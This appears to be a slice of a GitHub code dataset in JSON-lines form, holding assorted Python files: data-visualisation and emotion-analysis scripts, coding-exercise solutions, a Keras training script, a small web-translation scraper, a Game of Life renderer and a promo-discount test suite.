keepcolumns = [ 'Country Name' ,'1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'],\\\n         value_variables = [ '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2000', '2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014'] )\n    df.columns = ['country', 'year', 'elec']\n    df.sort_values('year', ascending=False, inplace=True)\n    for country in countrylist:\n        x_val = df[df['country'] == country].year.tolist()\n        y_val = df[df['country'] == country].elec.tolist()\n        graph_three.append(\n          go.Scatter(\n          x = x_val,\n          y = y_val,\n          mode = 'lines',\n          name = country\n          )\n        )\n\n    layout_three = dict(title = 'Change in Electricity Consumption from 1990 to 2015',\n                xaxis = dict(title = 'Year',\n                  autotick=False, tick0=1990, dtick=25),\n                yaxis = dict(title = 'Electricity Consumption'),\n                )\n    \n# fourth chart shows GDP vs labor force vs electricity consumption\n    graph_four = []\n    \n    valuevariables = [str(x) for x in range(1995, 2016)]\n    keepcolumns = [str(x) for x in range(1995, 2016)]\n    keepcolumns.insert(0, 'Country Name')\n\n    df_one = cleandata('data/WB_GDP_per_capita.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n    df_two = cleandata('data/WB_Labor_force.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n    df_three = cleandata('data/WB_Elec_Pwr_cnsmp.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n    \n    df_one.columns = ['country', 'year', 'variable']\n    df_two.columns = ['country', 'year', 'variable']\n    df_three.columns = ['country', 'year', 'variable']\n    \n    df = df_one.merge(df_two, on=['country', 'year'])\n    df = df.merge(df_three, on=['country', 'year'])\n\n    for country in countrylist:\n        x_val = df[df['country'] == country].variable_x.tolist()\n        y_val = df[df['country'] == country].variable_y.tolist()\n        z_val = df[df['country'] == country].variable.tolist()\n        year = df[df['country'] == country].year.tolist()\n        country_label = df[df['country'] == country].country.tolist()\n\n        text = []\n        for country, year in zip(country_label, year):\n            text.append(str(country) + ' ' + str(year))\n\n        graph_four.append(\n            go.Scatter3d(\n            x = x_val,\n            y = y_val,\n            z = z_val,\n            text = text,\n            name = country,\n            textposition = 'top left'\n            )\n        )\n\n    layout_four = dict(title = 'GDP vs Labor Force vs Electricity Consumption',\n                xaxis = dict(title = 'GDP per capita'),\n                yaxis = dict(title = 'Labor Force'),\n                )\n    \n    # append all charts to the figures list\n    figures = []\n    figures.append(dict(data=graph_one, layout=layout_one))\n    figures.append(dict(data=graph_two, layout=layout_two))\n    figures.append(dict(data=graph_three, layout=layout_three))\n    figures.append(dict(data=graph_four, layout=layout_four))\n    \n    return figures","repo_name":"chinmaytuw/DSND_WorldBank_WebApp","sub_path":"wrangling_scripts/wrangle_data.py","file_name":"wrangle_data.py","file_ext":"py","file_size_in_byte":6967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"26952101732","text":"import ast\nimport sys\n\nfrom hulks.base import BaseHook\n\n\nclass CheckPrintHook(BaseHook):\n    def _show_error_message(self, filename, line_number):\n        msg = \"{}, line={}: call to print found, please remove it.\"\n        print(msg.format(filename, line_number))\n\n    def validate(self, filename, **options):\n        retval = True\n        parsed_tree = ast.parse(open(filename).read(), filename)\n        for node in ast.walk(parsed_tree):\n            if isinstance(node, ast.Name) and node.id == \"print\":\n                self._show_error_message(filename, node.lineno)\n                retval = False\n        return retval\n\n\ndef main(args=None):\n    \"\"\"Checks 'print' usage\"\"\"\n    hook = CheckPrintHook()\n    sys.exit(hook.handle(args))\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","repo_name":"olist/hulks","sub_path":"src/hulks/check_print.py","file_name":"check_print.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"}
+{"seq_id":"92777408","text":"T = int(input())\r\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\r\nfor test_case in range(1, T + 1):\r\n    N=int(input())\r\n    red =[]\r\n    blue =[]\r\n    for idx in range(N):\r\n        x1,y1,x2,y2,color = (list(map(int, input().split())))\r\n        for i in range(x1,x2+1):\r\n            for j in range(y1,y2+1):\r\n                if color == 1:\r\n                    red.append([i,j])\r\n                else:\r\n                    blue.append([i,j])\r\n    new_list=[]\r\n    for r in red:\r\n        if r in blue:\r\n            new_list.append(r)\r\n    print('#%s %d'%(test_case,len(new_list)))\r\n    ","repo_name":"ms-kim520/Coding_Study","sub_path":"swea_4836_list.py","file_name":"swea_4836_list.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"39645464098","text":"#utf-8\r\n\r\nimport re\r\nimport jieba\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sin, asin, cos, radians, fabs, sqrt\r\n\r\nEARTH_RADIUS = 6371 #地球半径6371km\r\n\r\nemo_index = {\r\n    'anger' : 0,\r\n    'disgust': 1,\r\n    'fear' : 2,\r\n    'joy' : 3,\r\n    'sadness': 4\r\n}\r\n\r\nemo_color = {\r\n    'anger' : 'r',\r\n    'disgust': 'm',\r\n    'fear' : 'k',\r\n    'joy' : 'y',\r\n    'sadness': 'b'\r\n}\r\n\r\ncity_coord = {\r\n    'beijing' : [39.92, 116.46],\r\n    'shanghai' : [31.22, 121.48],\r\n    'guangzhou': [23.16, 113.23],\r\n    'chengdu' : [30.67, 104.06]\r\n}\r\n\r\nanger='E:/code-Python/week3/emotion_lexicon/anger.txt'\r\ndisgust='E:/code-Python/week3/emotion_lexicon/disgust.txt'\r\nfear='E:/code-Python/week3/emotion_lexicon/fear.txt'\r\njoy='E:/code-Python/week3/emotion_lexicon/joy.txt'\r\nsadness='E:/code-Python/week3/emotion_lexicon/sadness.txt'\r\n\r\ndef txt_dispart(path):\r\n    '''读取文件并将location&text&user_id&created_time分开'''\r\n    pass\r\n    txt_new=[]\r\n    dic={}\r\n    with 
open(path,mode='r',encoding='utf-8')as f:\r\n txt=[s.rstrip() for s in f.readlines()]\r\n for item in txt:\r\n txt_new.append(item.split('\\t'))\r\n weibo_location,weibo_text,user_id,created_time=[],[],[],[]\r\n del txt_new[0]\r\n for item in txt_new:\r\n weibo_location.append(item[0])\r\n weibo_text.append(item[1])\r\n user_id.append(item[2])\r\n created_time.append(item[3])\r\n '''位置分割'''\r\n loc=[]\r\n for item in weibo_location:\r\n item.rstrip('[]')\r\n s=item.split(\",\")\r\n s[0]=float(s[0][1:])\r\n s[1]=float(s[1][1:-1])\r\n loc.append(s)\r\n dic['location']=loc\r\n dic['word']=weibo_text\r\n dic['id']=user_id\r\n '''时间分割'''\r\n t=[]\r\n for item in created_time:\r\n t.append(item.split(\" \"))\r\n dic['time']=t\r\n return dic\r\n \r\ndef txt_add(anger,disgust,fear,joy,sadness):\r\n '''将情绪词文件加入jieba库的自定义词典'''\r\n pass\r\n jieba.load_userdict(anger)\r\n jieba.load_userdict(disgust)\r\n jieba.load_userdict(fear)\r\n jieba.load_userdict(joy)\r\n jieba.load_userdict(sadness)\r\n return 1\r\n\r\ndef txt_read(path):\r\n '''txt文件读取'''\r\n pass\r\n with open(path,mode = 'r',encoding='utf-8') as file:\r\n txt=[s.rstrip() for s in file.readlines()]\r\n txt.append(\" \")\r\n return txt\r\n\r\ndef data_wash(word,stopwords):\r\n '''进行数据清洗'''\r\n pass\r\n after=[]\r\n URL_REGEX = re.compile('(http|ftp|https):\\/\\/[\\w\\-_]+(\\.[\\w\\-_]+)+([\\w\\-\\.,@?^=%&:/~\\+#]*[\\w\\-\\@?^=%&/~\\+#])?',\r\n re.IGNORECASE)\r\n for text in word:\r\n text = re.sub(URL_REGEX,\"\",text)#去除网址\r\n text = re.sub(r'[0-9.?,@\\t]+','',text)#去除数字及部分符号\r\n after.append([word for word in jieba.lcut(text) if word not in stopwords])\r\n return after\r\n\r\ndef create_emo_vec(word,anger,disgust,fear,joy,sadness):\r\n '''构建情绪向量'''\r\n pass\r\n emo_lis=[]\r\n emo_lis.append(txt_read(anger))\r\n emo_lis.append(txt_read(disgust))\r\n emo_lis.append(txt_read(fear))\r\n emo_lis.append(txt_read(joy))\r\n emo_lis.append(txt_read(sadness))\r\n def emo_vec():\r\n '''构建向量'''\r\n nonlocal word,emo_lis\r\n stand=[0,0,0,0,0,0] #[anger,disgust,fear,joy,sadness,max_index]\r\n for item in word:\r\n for i in range(5):\r\n if item in emo_lis[i]:\r\n stand[i]+=1\r\n '''标准化向量'''\r\n s=sum(stand)\r\n if s!=0:\r\n for i in range(5):\r\n stand[i]/=s\r\n '''寻找MAX'''\r\n stand[5]=stand.index(max(stand))\r\n else:#没有情绪词\r\n stand[5]=-1\r\n return stand\r\n return emo_vec\r\n\r\ndef paint_time(word,data,mode,*emos):\r\n '''输入模式以及情绪类型得到情绪强度-时间折线图'''\r\n pass\r\n plt.figure(num=1)\r\n if mode == 'week':\r\n x = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n for emo in emos:\r\n y = [0] * 7\r\n y_total = [0] * 7\r\n ind=0\r\n for item in data['time']:\r\n i = x.index(item[0])\r\n y[i]+=create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]]\r\n y_total[i] += 1\r\n ind+=1\r\n for i in range(7):\r\n if y_total[i]!=0:\r\n y[i] /= y_total[i]\r\n plt.plot(x, y, emo_color[emo])\r\n\r\n if mode == 'day':\r\n x = list(range(30))\r\n for emo in emos:\r\n y = [0] * 30\r\n y_total = [0] * 30\r\n ind=0\r\n for item in data['time']:\r\n i = int(item[2])\r\n y[i] +=create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]]\r\n y_total[i] += 1\r\n ind+=1\r\n for i in range(24):\r\n if y_total[i]!=0:\r\n y[i] /= y_total[i]\r\n plt.plot(x, y, emo_color[emo])\r\n plt.xticks(x) \r\n plt.legend(emos)\r\n plt.show()\r\n\r\ndef get_distance(coord1, coord2):\r\n '''用haversine公式计算球面两点间的距离'''\r\n def hav(theta):\r\n s = sin(theta / 2)\r\n return s * s\r\n\r\n lat1 = radians(coord1[0])\r\n lng1 = radians(coord1[1])\r\n lat2 = 
radians(coord2[0])\r\n lng2 = radians(coord2[1])\r\n dlng = fabs(lng1 - lng2)\r\n dlat = fabs(lat1 - lat2)\r\n h = hav(dlat) + cos(lat1) * cos(lat2) * hav(dlng)\r\n distance = 2 * EARTH_RADIUS * asin(sqrt(h))\r\n return distance\r\n\r\ndef paint_loc(word,data,city,*emos):\r\n '''输入城市以及情绪得到情绪变化-半径折线图'''\r\n pass\r\n plt.figure(num=2)\r\n center = city_coord[city]\r\n dist_emo_list = []\r\n ind=0\r\n for item in data['location']:\r\n if (abs(item[0] - center[0]) < 2) and (abs(item[1] - center[1]) < 2):\r\n dist_emos = [get_distance(center, item),]\r\n for emo in emos:\r\n dist_emos.append(create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]])\r\n dist_emo_list.append(dist_emos)\r\n ind+=1\r\n dist_emo_list = sorted(dist_emo_list, key = (lambda x:x[0])) # 按与中心的距离排序\r\n \r\n count = 0\r\n emo = [0,] * len(emos)\r\n x = list(np.arange(0, 10, 0.1))\r\n ys = []\r\n for i in x:\r\n while dist_emo_list[count][0] < i:\r\n for j in range(len(emos)):\r\n emo[j] += dist_emo_list[count][j + 1]\r\n count += 1\r\n if count != 0: ys.append([e / count for e in emo])\r\n else: ys.append([e / 1.0 for e in emo])\r\n for i in range(len(emos)):\r\n y = [x[i] for x in ys]\r\n plt.plot(x, y, emo_color[emos[i]])\r\n \r\n plt.legend(emos)\r\n plt.show()\r\n\r\ndef main():\r\n data=txt_dispart('E:/code-Python/week3/test.txt')\r\n txt_add(anger,disgust,fear,joy,sadness)\r\n word=data_wash(data['word'],txt_read('E:/code-Python/week2/stopwords_list.txt'))\r\n paint_time(word,data,'week','joy','disgust')\r\n '''paint_time(word,data,'day','sadness','fear')'''\r\n paint_loc(word,data,'beijing','joy','sadness')\r\n\r\nmain()","repo_name":"Dream-cli/Design_Homework","sub_path":"emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22428159269","text":"from keras.layers import Activation, Convolution2D, Dense, Dropout, Flatten, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.models import Sequential, Model\nfrom keras.applications.xception import preprocess_input\nfrom keras.applications import Xception, InceptionV3\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.models import load_model\n\ndef create_transfer_model(input_size, n_categories, weights = 'imagenet'):\n\n base_model = Xception(weights=weights,\n include_top=False,\n input_shape=input_size)\n\n model = base_model.output\n model = GlobalAveragePooling2D()(model)\n predictions = Dense(n_categories, activation='softmax')(model)\n model = Model(inputs=base_model.input, outputs=predictions)\n\n return model\n\ndef change_trainable_layers(model, trainable_index):\n\n for layer in model.layers[:trainable_index]:\n layer.trainable = False\n for layer in model.layers[trainable_index:]:\n layer.trainable = True\n\n\n\nif __name__=='__main__':\n model=create_transfer_model([75,75,3],5)\n train=ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('data/holdout',target_size=[75,75],batch_size=27)\n validate=ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('data/train2/asl_alphabet_test',[75,75],batch_size=27)\n tensor=TensorBoard(log_dir='./tens_logs', histogram_freq=0, batch_size=27, write_graph=True, write_grads=False, write_images=False)\n callbacks = ModelCheckpoint('./last_tl_log',save_best_only=True)\n # holdout_folder = 
ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('../data/holdout_small',[100,100],batch_size=16)\n # metrics = best_model.evaluate_generator(holdout_folder, steps=11)\n # print(metrics)\n trans_model = create_transfer_model((75,75,3),27)\n _ = change_trainable_layers(trans_model, 132)\n trans_model.compile(optimizer=RMSprop(lr=0.0005), loss='categorical_crossentropy', metrics=['accuracy'])\n trans_model.fit_generator(train, epochs=10, steps_per_epoch=30, validation_data=validate,validation_steps=5, callbacks=[callbacks, tensor])\n _ = change_trainable_layers(trans_model, 126)\n trans_model.compile(optimizer=RMSprop(lr=0.0005), loss='categorical_crossentropy', metrics=['accuracy'])\n trans_model.fit_generator(train, epochs=50, steps_per_epoch=30, validation_data=validate,validation_steps=5, callbacks=[callbacks, tensor])\n","repo_name":"MathiasStensrud/capstone-2","sub_path":"tl.py","file_name":"tl.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13575111118","text":"import re\n# parse file\nfname = \"adventofcode22/python/d4/input.txt\"\nwith open(fname) as f:\n lines = []\n for line in f:\n a=line.strip('\\n').split(',')\n lines.append(a)\ntotal = 0\ntotal1 = 0\nfor i in lines:\n #process numbers\n numlist = re.findall(r'\\d+', i[0])\n numlist1 = re.findall(r'\\d+', i[1])\n startnum = int(numlist[0])\n endnum = int(numlist[1])\n startnum1 = int(numlist1[0])\n endnum1 = int(numlist1[1])\n \n # checklist = []\n # checklist2 = []\n # for i in range (int(startnum),int(endnum)):\n # checklist.append(str(i))\n # for i in range (int(startnum1),int(endnum1)):\n # checklist2.append(str(i))\n # if (startnum1 in checklist and endnum1 in checklist):\n # total+=1\n # elif (startnum in checklist2 and endnum in checklist2):\n # total+=1\n \n #check conditions\n if((startnum<=startnum1) and (endnum>=endnum1)):\n total+=1\n total1+=1\n elif((startnum1<=startnum) and (endnum1>=endnum)):\n total +=1\n total1+=1\n \n #part 2 \n elif(startnum<=startnum1 and startnum1<=endnum):\n total1+=1\n elif(startnum1<=startnum and startnum<=endnum1):\n total1+=1\n \nprint(total)\nprint(total1)","repo_name":"jiajingan/AOC","sub_path":"adventofcode22/python/d04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12703029168","text":"import cv2 as cv\n\nimg = cv.imread('Photos/cat.jpeg')\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray', gray)\n\nthreshold, thresh = cv.threshold(gray, 150, 255, cv.THRESH_BINARY)\ncv.imshow('Simple Threshold', thresh)\n\nthreshold, thresh_inv = cv.threshold(gray, 150, 255, cv.THRESH_BINARY_INV)\ncv.imshow('Simple Inverse Threshold', thresh_inv)\n\nadaptive_thresh = cv.adaptiveThreshold(gray, 255, cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY, 11, 3)\ncv.imshow('Adaptive Threshold', adaptive_thresh)\n\ncv.waitKey(0)","repo_name":"bibinss/opencv","sub_path":"thresh.py","file_name":"thresh.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40824036307","text":"\"\"\"\nQuestion 2\nLevel 1\n\nQuestion:\nWrite a program which can compute the factorial of a given numbers.\nThe results should be printed in a comma-separated sequence on a single line.\nSuppose the following input is supplied to the program:\n8\nThen, the 
output should be:\n40320\n\nHints:\nIn case of input data being supplied to the question, it should be assumed to be a console input.\n\n\"\"\"\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\nn=int(input(\"Input a number to compute the factiorial : \"))\nprint(factorial(n))\n\n\n\n","repo_name":"Patibandha/PD008bootcamp","sub_path":"Exercises_Answer/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15823553001","text":"from articles.models import Article\nfrom articles.scripts import feed\nimport time\n\ndef run_dayily_schedule(crollers):\n count = 0\n for croller in crollers:\n croller = croller()\n for title, url, preface, img_url in croller.feed():\n if Article.objects.filter(url=url).exists():\n continue\n article = Article(title=title, url=url, preface=preface, img_url=img_url)\n print(vars(article))\n article.save()\n count += 1\n time.sleep(10)\n print('{0} articles registered.'.format(count))\n\nrun_dayily_schedule(feed.CROLLERS)\n\nif __name__ == '__main__':\n run_dayily_schedule(feed.CROLLERS)\n","repo_name":"yasunt/famo","sub_path":"articles/scripts/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18011633877","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom google.cloud import translate_v2 as translate\n\n# Define the website URL to translate\nurl = \"https://www.example.com\"\n\n# Define the target language\ntarget_language = \"hi\"\n\n# Set up the Google Cloud Translation API\ntranslate_client = translate.Client()\n\n# Get the website content\nresponse = requests.get(url)\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# Extract the text content from the website\ntext = \"\"\nfor element in soup.find_all(text=True):\n text += f\"{element} \"\n\n# Translate the text content to Hindi\nresult = translate_client.translate(text, target_language=target_language)\n\n# Print the translated text\nprint(result[\"input\"])\nprint(result[\"translatedText\"])\n\n","repo_name":"OkechEdu/Website-Crawler","sub_path":"hindi-scrapper-ggogle-translate.py","file_name":"hindi-scrapper-ggogle-translate.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31283577488","text":"import sys\nimport platform\nimport atexit\n\n\nclass NullDisplay(object):\n \"\"\"\n Dummy renderer for a Game of Life board or nested list\n\n This renderer does nothing.\n \"\"\"\n def __init__(self, *args):\n pass\n\n def show(self, gol, title=''):\n pass\n\n\nclass TextDisplay(object):\n \"\"\"\n Renderer for a Game of Life board or nested list for text terminals\n\n :param height: the maximum height to display the board\n :type height: int\n :param width: the maximum width to display the board\n :type width: int\n\n This renderer requires ANSII support by the terminal.\n \"\"\"\n def __init__(self, height=128, width=128):\n self.height = height\n self.width = width\n\n def show(self, gol, title='<Title>'):\n self._show_array(gol, title=title)\n\n def _show_array(self, gol_array, title):\n sys.stdout.write(\"\\x1b[H\")\n draw_width = min(self.width, gol_array.width)\n print('-', title, '-' * max(draw_width - 3 - len(title), 0))\n for h in range(min(self.height, gol_array.height)):\n row = 
gol_array[h]\n print(''.join('#' if row[w] else ' ' for w in range(min(self.width, gol_array.width))))\n print('-' * gol_array.width)\n\n\nclass NativeMPLDisplay(object):\n \"\"\"\n Renderer for a Game of Life board or nested list for text terminals\n\n :param height: the maximum height to display the board\n :type height: int\n :param width: the maximum width to display the board\n :type width: int\n\n This renderer requires :py:mod:`matplotlib`.\n \"\"\"\n def __init__(self, height=640, width=640):\n from matplotlib import pyplot\n self.height = height\n self.width = width\n pyplot.draw()\n\n def show(self, gol, title='<Title>'):\n self._show_mpl(gol, title=title)\n\n def _show_mpl(self, gol_array, title):\n from matplotlib import pyplot\n draw_height = min(self.height, gol_array.height)\n draw_width = min(self.width, gol_array.width)\n content = []\n for line_idx in range(draw_height):\n line = gol_array[line_idx]\n content.append([line[row_idx] for row_idx in range(draw_width)])\n pyplot.clf()\n pyplot.title(title)\n pyplot.imshow(content)\n pyplot.pause(0.000001)\n\nMPLDisplay = NativeMPLDisplay\n\n__all__ = ['TextDisplay', 'MPLDisplay', 'NullDisplay']\n","repo_name":"MaineKuehn/workshop-collaborative_software","sub_path":"gksolite/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73438400552","text":"with open('input.txt') as file:\n lines = [line.rstrip() for line in file]\n\nmost = 0\nsum = 0\n\nfor line in lines:\n if (line == ''):\n if (sum > most):\n most = sum\n sum = 0\n else:\n sum = sum + int(line)\n\nprint(most)\n","repo_name":"lhammarstrom/aoc","sub_path":"2022/1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"183239239","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.matcher import Absent, NotEmpty\nfrom core.report import REQUEST_TIMESTAMP\nfrom core.testcase import TestCase, main\nfrom core.types import DynamicBlueGenericBundlesPromos, DynamicPromo, Promo, PromoType\nfrom core.types.offer_promo import (\n PromoDirectDiscount,\n PromoSpreadDiscountCount,\n PromoCheapestAsGift,\n)\nfrom core.types.sku import MarketSku, BlueOffer\nfrom core.types.autogen import b64url_md5\nfrom core.types.dynamic_filters import DynamicPromoKeysBlacklist\n\nfrom datetime import datetime, timedelta\nfrom itertools import count\nfrom math import floor\n\n\nnow = datetime.fromtimestamp(REQUEST_TIMESTAMP)\ndelta_big = timedelta(days=1)\ndelta_small = timedelta(hours=5)\n\n\nFEED_ID = 777\nDEFAULT_HID = 8001\nHID_1 = 8002\n\nnummer = count()\n\n\ndef get_offer_id(x):\n return 'offer_id_{}'.format(x)\n\n\ndef __blue_offer(offer_id, price=1000, price_old=1000, is_fulfillment=True):\n num = next(nummer)\n return BlueOffer(\n waremd5=b64url_md5(num),\n price=price,\n price_old=price_old,\n fesh=FEED_ID,\n feedid=FEED_ID,\n offerid=get_offer_id(offer_id),\n is_fulfillment=is_fulfillment,\n )\n\n\ndef __msku(offers, hid):\n num = next(nummer)\n return MarketSku(sku=num, hyperid=num, hid=hid, blue_offers=offers if isinstance(offers, list) else [offers])\n\n\n###############################################################################################################\nblue_offer_for_one_promo = __blue_offer(offer_id=next(nummer), price=890, price_old=1000, 
is_fulfillment=True)\nmsku_for_single_promo = __msku(\n [\n blue_offer_for_one_promo,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция с двумя порогами скидки.\npromo_sdc_single = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount normal',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_1.com/',\n landing_url='http://spdc_1_landing.com/',\n shop_promo_id='spread_discount_count_single',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_single_promo.sku: [{'count': 3, 'percent_discount': 7}, {'count': 5, 'percent_discount': 13}],\n }\n ),\n)\nblue_offer_for_one_promo.promo = promo_sdc_single\n\n\n###############################################################################################################\nblue_offer_for_two_promos = __blue_offer(offer_id=next(nummer), price=890, price_old=1000, is_fulfillment=False)\nmsku_for_two_promos = __msku(\n [\n blue_offer_for_two_promos,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция одним порого скидки. Скидка должна складываться с \"прямой скидкой\".\npromo_sdc_two_promos = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount with direct discount',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_2.com/',\n landing_url='http://spdc_2_landing.com/',\n shop_promo_id='spread_discount_count_two_promos',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_two_promos.sku: [{'count': 3, 'percent_discount': 7}, {'count': 5, 'percent_discount': 13}],\n }\n ),\n)\n\npromo_dd_two_promos = Promo(\n promo_type=PromoType.DIRECT_DISCOUNT,\n description='direct discount with spread discount',\n key=b64url_md5(next(nummer)),\n url='http://direct_discount_1.com/',\n direct_discount=PromoDirectDiscount(\n items=[\n {\n 'feed_id': FEED_ID,\n 'offer_id': blue_offer_for_two_promos.offerid,\n 'discount_price': {'value': 800, 'currency': 'RUR'},\n }\n ],\n ),\n)\nblue_offer_for_two_promos.promo = [promo_sdc_two_promos, promo_dd_two_promos]\n\n\n###############################################################################################################\nblue_offer_for_too_low_discount = __blue_offer(offer_id=next(nummer), price=90, is_fulfillment=True)\nmsku_for_too_low_discount = __msku(\n [\n blue_offer_for_too_low_discount,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция маленькой скидкой\npromo_sdc_too_low_discount = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount with low discount',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_3.com/',\n landing_url='http://spdc_3_landing.com/',\n shop_promo_id='spread_discount_count_too_low_discount',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_too_low_discount.sku: [{'count': 11, 'percent_discount': 1}],\n }\n ),\n)\nblue_offer_for_too_low_discount.promo = promo_sdc_too_low_discount\n\n\n###############################################################################################################\nblue_offer_loose_for_cg = __blue_offer(offer_id=next(nummer), price=900, is_fulfillment=True)\nmsku_loose_for_cg = __msku(\n [\n blue_offer_loose_for_cg,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция spread discount count\npromo_sdc_loose_for_cg = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount loosing cheapest as gift',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_4.com/',\n landing_url='http://spdc_4_landing.com/',\n 
shop_promo_id='spread_discount_count_loose_for_cg',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_loose_for_cg.sku: [{'count': 11, 'percent_discount': 6}],\n }\n ),\n)\n\n# Действующая акция cheapest as gift\npromo_cg_win = Promo(\n promo_type=PromoType.CHEAPEST_AS_GIFT,\n key=b64url_md5(next(nummer)),\n url='http://localhost.ru/',\n cheapest_as_gift=PromoCheapestAsGift(\n offer_ids=[\n (FEED_ID, blue_offer_loose_for_cg.offerid),\n ],\n count=3,\n promo_url='',\n link_text='text',\n ),\n)\nblue_offer_loose_for_cg.promo = [promo_sdc_loose_for_cg, promo_cg_win]\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n cls.settings.default_search_experiment_flags += ['enable_fast_promo_matcher=0;enable_fast_promo_matcher_test=1']\n\n cls.index.mskus += [msku_for_single_promo, msku_for_two_promos, msku_for_too_low_discount, msku_loose_for_cg]\n\n cls.index.promos += [\n promo_sdc_single,\n promo_sdc_two_promos,\n promo_dd_two_promos,\n promo_sdc_too_low_discount,\n promo_sdc_loose_for_cg,\n promo_cg_win,\n ]\n\n cls.settings.loyalty_enabled = True\n cls.dynamic.loyalty += [DynamicBlueGenericBundlesPromos(whitelist=[promo.key for promo in cls.index.promos])]\n\n def __calc_discount_percent(self, old_price, new_price):\n return int(floor((1 - 1.0 * new_price / old_price) * 100.0 + 0.5))\n\n def __check_present_promo_fragment(self, response, promo, msku, offer):\n\n # Проверяем что в выдаче есть оффер с корректным блоком 'promos'\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(offer.price),\n 'currency': 'RUR',\n },\n 'promos': [promo.spread_discount_count.promo_fragment(offer, msku)],\n }\n ],\n allow_different_len=False,\n )\n\n def __check_absent_promo_fragment(self, response, waremd5):\n # Проверяем, что блок промо отсутствует\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': waremd5,\n 'promos': Absent(),\n }\n ],\n )\n\n # Проверяем, что в ответе репорта есть блок promo\n def check_promo(self, check_present, promo, msku, offer, rearr_flags=None, add_url=\"\"):\n for rgb in ('blue', 'green', 'green_with_blue'):\n for place in ('sku_offers', 'prime'):\n for rearr_flag in rearr_flags or (None,):\n request = 'place={place}&rids=0®set=1&pp=18&market-sku={msku}&rgb={rgb}'\n if rearr_flag is not None:\n request += '&rearr-factors=market_promo_spread_discount_count={}'.format(rearr_flag)\n request = request.format(place=place, msku=msku, 